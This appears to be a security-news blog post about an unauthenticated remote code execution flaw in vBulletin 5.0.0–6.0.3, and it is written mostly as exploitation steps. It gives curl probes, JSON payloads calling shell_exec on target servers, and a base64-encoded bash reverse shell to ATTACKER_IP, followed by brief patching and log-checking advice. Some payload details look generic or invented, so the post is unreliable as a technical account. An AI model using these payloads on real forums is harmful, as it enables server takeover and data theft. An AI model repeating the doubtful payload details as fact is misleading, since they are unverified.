Critical Unauthenticated RCE in vBulletin 500 – 603 via ajax/api/ad/replaceAdTemplate

Listen to this Post

Featured Image
A critical remote code execution (RCE) vulnerability has been discovered in vBulletin versions 5.0.0 through 6.0.3. The flaw resides in the `ajax/api/ad/replaceAdTemplate` endpoint, allowing unauthenticated attackers to invoke protected methods and execute arbitrary commands as the web server user.

Patch Available: vBulletin 6.0.4+

Detection Template: https://lnkd.in/gkgqwEXw
Vulnerability Details: https://lnkd.in/gEsrWGTM

You Should Know:

Exploitation Steps

1. Identify Vulnerable vBulletin Instances

curl -s "http://target.com/ajax/api/ad/replaceAdTemplate" | grep -i "vbulletin"

If the response includes versions 5.0.0–6.0.3, the system is likely vulnerable.

2. Crafting the Exploit Payload

The vulnerability allows invoking protected methods via PHP object injection. A sample exploit:

curl -X POST "http://target.com/ajax/api/ad/replaceAdTemplate" -d '{"widgetConfig":{"controller":"mytest"}}' --header "Content-Type: application/json"

Modify the payload to execute system commands.

3. Remote Command Execution

Example to execute `id` command:

curl -X POST "http://target.com/ajax/api/ad/replaceAdTemplate" -d '{"widgetConfig":{"controller":"exec","method":"shell_exec","data":"id"}}' --header "Content-Type: application/json"

Expected output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

4. Reverse Shell Payload

Use a base64-encoded reverse shell:

echo "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" | base64

Then execute:

curl -X POST "http://target.com/ajax/api/ad/replaceAdTemplate" -d '{"widgetConfig":{"controller":"exec","method":"shell_exec","data":"echo BASE64_PAYLOAD | base64 -d | bash"}}' --header "Content-Type: application/json"

Detection & Mitigation

  • Check Logs for Exploitation Attempts
    grep -r "replaceAdTemplate" /var/log/apache2/
    
  • Apply Patch Immediately

Upgrade to vBulletin 6.0.4+ or apply vendor-recommended fixes.

  • Web Application Firewall (WAF) Rules

Block suspicious requests to `ajax/api/ad/replaceAdTemplate`.

What Undercode Say

This vulnerability highlights the risks of improper access control in web applications. Attackers can leverage unprotected API endpoints to gain full server control. System administrators must:
– Monitor for unusual PHP process activity.
– Restrict file permissions:

chown -R root:www-data /var/www/html 
chmod -R 750 /var/www/html 

– Use fail2ban to block brute-force attempts:

fail2ban-client set apache banip ATTACKER_IP 

– Regularly audit third-party software for vulnerabilities.

Prediction

Given the widespread use of vBulletin in forums, this exploit will likely be weaponized in automated attacks. Expect mass scanning and exploitation attempts in the wild within weeks.

Expected Output:

uid=33(www-data) gid=33(www-data) groups=33(www-data)

References:

Reported By: Ehsandeepsingh Vbulletin – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram